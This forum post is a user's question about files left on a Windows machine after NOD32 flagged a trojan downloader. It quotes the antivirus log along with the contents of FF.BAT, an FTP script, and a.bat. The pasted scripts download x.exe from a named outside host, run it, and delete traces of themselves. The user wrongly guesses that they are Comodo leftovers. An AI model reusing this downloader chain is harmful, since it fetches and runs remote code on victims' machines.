FF.BAT and other stuff

Few weeks ago I thought I had a virus as NOD32 was reporting like this:

Time Module Object Name Threat Action User Information 15/02/2008 12:34:19 AMON file C:\run.vbs probably a variant of BAT/TrojanDownloader.Agent trojan NT AUTHORITY\SYSTEM Event occurred on a new file created by the application: C:\Program Files\COMODO\Firewall\cmdagent.exe. The file was moved to quarantine. You may close this window. 13/02/2008 16:55:32 AMON file C:\run.vbs probably a variant of BAT/TrojanDownloader.Agent trojan NT AUTHORITY\SYSTEM Event occurred on a new file created by the application: C:\Program Files\COMODO\Firewall\cmdagent.exe. The file was moved to quarantine. You may close this window. 11/02/2008 18:28:50 AMON file C:\run.vbs probably a variant of BAT/TrojanDownloader.Agent trojan NT AUTHORITY\SYSTEM Event occurred on a new file created by the application: C:\Program Files\COMODO\Firewall\cmdagent.exe. The file was moved to quarantine. You may close this window. 10/02/2008 12:00:29 AMON file C:\run.vbs probably a variant of BAT/TrojanDownloader.Agent trojan NT AUTHORITY\SYSTEM Event occurred on a new file created by the application: C:\Program Files\COMODO\Firewall\cmdagent.exe. The file was moved to quarantine. You may close this window.

I upgraded, then downgraded (dont ask) NOD32 and I am no longer getting the warnings. But I notice now that I have the following (contents listed after each instance) in the root of C:

FF.BAT

ftp -s:c:\gz c:\xz.exe del c:\gz cmd /c c:\a.bat del c:\ff.bat

gz

open 6dyy.vicp.net tat 123 binary get x.exe c:\xz.exe bye

a.bat

del c:\run.vbs del c:\a.bat

This obviously seems to be related to Comodo. The files are dated 10 March 2008. Are these leftovers and can they be deleted? And what are they? Anyone know?

Ive uninstalled NOD32 2.7 and 3.0. and never had any files left over like that. I have also uninstalled Comodo 3.0 several times and still ad no files like that.

Do any of the admins/programers ever give answers here - because NOD32 has started reporting run.vbs and ff.bat as trojans again?. I guess this is because I went back to NOD v2

Im using Avria now is alot better then NOD32.